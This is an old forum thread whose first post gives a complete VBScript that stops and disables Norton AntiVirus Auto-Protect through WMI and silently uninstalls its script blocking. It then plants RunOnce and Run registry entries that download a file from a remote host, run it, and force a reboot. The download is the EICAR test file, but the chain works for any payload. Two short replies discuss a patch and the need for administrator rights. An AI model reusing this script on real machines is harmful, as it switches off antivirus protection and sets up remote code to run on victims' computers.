Norton Anti-Virus Script Blocking Bypass
Results 1 to 3 of 3

Thread: Norton Anti-Virus Script Blocking Bypass

  1. #1
    Junior Member
    Join Date
    Nov 2001
    Posts
    20

    Exclamation Norton Anti-Virus Script Blocking Bypass

    Just wanted you all to know there is a ner exploit against NAV 2004 / 2005 wich allows the shutdown and bypass of norton's auto protection .
    So all you norton users beware.
    Since ther is no patch yet
    Here follows the proof of principle so you know what to expect:
    Code:
    --------------//// BEGIN DISABLE_NAV.VBS ////-----------------
    
    ' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----
    
    sServer = "."
    Set oWMI = GetObject("winmgmts://.")
    
    sServiceName = "Norton AntiVirus Auto-Protect Service"
    sWQL = "Select state from Win32_Service " _
    & "Where displayname='" & sServiceName & "'"
    Set oResults = oWMI.ExecQuery(sWQL)
    For Each oService In oResults
    oService.StopService
    oService.ChangeStartMode("Disabled")
    Next
    
    ' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ;) ----------
    
    const HKEY_LOCAL_MACHINE = &H80000002
    
    strComputer = "."
    
    Set objRegistry =
    GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
    strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
    strValueName = "Uninstall Norton Script Blocking"
    arrStringValues = ("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q")
    objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
    arrStringValues
    
    ' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------
    
    Set objRegistry =
    GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
    strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
    strValueName = "Create Code Downloader"
    arrStringValues = ("cmd /c ECHO Set
    X=CreateObject("+chr(34)+"Microsoft.XMLHTTP"+chr(34)+"):X.open
    "+chr(34)+"GET"+chr(34)+",("+chr(34)+"http://www.eicar.org/download/eicar.com"+chr(34)+"),False:X.s end:set
    Y=createobject("+chr(34)+"adodb.stream"+chr(34)+"):Y.type=1:Y.open:Y.write
    X.responseBody:Y.savetofile("+chr(34)+"eicar.com"+chr(34)+"),2:Y.close >
    estart.VBS")
    objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
    arrStringValues
    
    ' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------
    
    Set objRegistry =
    GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
    strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
    strValueName = "Create Code Launcer"
    arrStringValues = ("cmd /c ECHO wscript.sleep(10000):Set
    Z=CreateObject("+chr(34)+"WSCript.Shell"+chr(34)+"):Z.run("+chr(34)+"cmd
    /k eicar.com"+chr(34)+") > elaunch.vbs")
    objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
    arrStringValues
    
    ' -------- LAUNCH EICAR DOWNLOADER ----------
    
    Set objRegistry =
    GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
    strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    strValueName = "Execute Code DownLoader"
    arrStringValues = ("estart.vbs")
    objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
    arrStringValues
    
    ' -------- RUN THE 'VIRUS' ----------
    
    Set objRegistry =
    GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
    str KeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    strValueName = "Execute Malicious Code Launcher"
    arrStringValues = ("elaunch.vbs")
    objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
    arrStringValues
    
    ' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----
    
    Set wmi = GetObject("winmgmts:{(Shutdown)}")
    set objset = wmi.instancesof("win32_operatingsystem")
    for each obj in objset
    set os = obj : exit for
    next
    os.win32shutdown 2 + 4
    
    --------------//// END DISABLE_NAV.VBS ////-----------------
    \" I love fools and mistakes i\'m alway\'s making them \" (Charles Darwin)

  2. #2
    Senior Member
    Join Date
    Feb 2002
    Posts
    253
    recca,

    I just d/l a Symantec patch named WMI update for my copy of NAV 2003.
    My copy of NAV 2003 Professional doesn't seem to need a WMI patch.
    At least, it isn't forthcoming from the folks at Symantec.

  3. #3
    Member
    Join Date
    Dec 2003
    Posts
    97
    Since you're using WMI to cause this shutdown, you would need administrator rights on the box in order to run this script, correct? This, to me, seems like less of an exploit and more of an automated way to disable NAV if you're an admin.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •